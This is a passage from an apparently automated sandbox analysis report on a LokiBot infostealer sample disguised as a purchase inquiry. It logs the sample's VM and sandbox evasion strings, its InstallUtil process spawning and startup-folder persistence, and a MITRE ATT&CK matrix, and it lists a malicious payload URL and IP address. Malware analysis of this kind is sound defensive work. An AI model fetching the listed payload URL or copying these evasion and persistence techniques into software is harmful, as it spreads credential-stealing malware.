                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: NEW PURCHASE INQUIRY.scr.exe PID: 7156, type: MEMORYSTR
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeMemory allocated: 1220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeMemory allocated: 4C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeWindow / User API: threadDelayed 4335Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeWindow / User API: threadDelayed 1402Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 5344Thread sleep count: 4335 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 5344Thread sleep count: 1402 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -99094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98819s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98702s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98591s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98367s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98142s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -98000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97840s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97509s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe TID: 6052Thread sleep time: -97078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99312Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98819Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98702Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98591Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98484Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98367Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98265Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98142Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97840Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97734Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97625Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97509Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97406Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97297Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97187Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeThread delayed: delay time: 97078Jump to behavior
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2201566442.0000000006660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: XjtvmCieWqlrtMSo52R
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2179858426.0000000000DF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeQueries volume information: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts1
                      Scheduled Task/Job
                      1
                      Scripting
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping211
                      Security Software Discovery
                      Remote Services11
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets12
                      System Information Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      NEW PURCHASE INQUIRY.scr.exe68%ReversingLabsByteCode-MSIL.Infostealer.LokiBot
                      NEW PURCHASE INQUIRY.scr.exe100%AviraHEUR/AGEN.1308518
                      NEW PURCHASE INQUIRY.scr.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\CharSet.exe100%AviraHEUR/AGEN.1308518
                      C:\Users\user\AppData\Roaming\CharSet.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\CharSet.exe68%ReversingLabsByteCode-MSIL.Infostealer.LokiBot
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.new.eventawardsrussia.com/wp-includes/Hniyg.dat100%Avira URL Cloudmalware
                      https://www.new.eventawardsrussia.com0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.new.eventawardsrussia.com
                      5.23.51.54
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://www.new.eventawardsrussia.com/wp-includes/Hniyg.datfalse
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netNEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/mgravell/protobuf-netiNEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJNEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/11564914/23354;NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/2152978/23354NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.new.eventawardsrussia.comNEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      5.23.51.54
                                      www.new.eventawardsrussia.comRussian Federation
                                      9123TIMEWEB-ASRUfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1586491
                                      Start date and time:2025-01-09 08:18:09 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 24s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:NEW PURCHASE INQUIRY.scr.exe
                                      Detection:MAL
                                      Classification:mal100.expl.evad.winEXE@4/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 345
                                      • Number of non-executed functions: 44
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InstallUtil.exe, PID 6564 because it is empty
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: NEW PURCHASE INQUIRY.scr.exe
                                      TimeTypeDescription
                                      02:18:58API Interceptor26x Sleep call for process: NEW PURCHASE INQUIRY.scr.exe modified
                                      08:19:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbs
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      5.23.51.54SpiMLVsYmg.exeGet hashmaliciousUnknownBrowse
                                      • ck12339.tmweb.ru/reciver.php
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.new.eventawardsrussia.comOrder Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
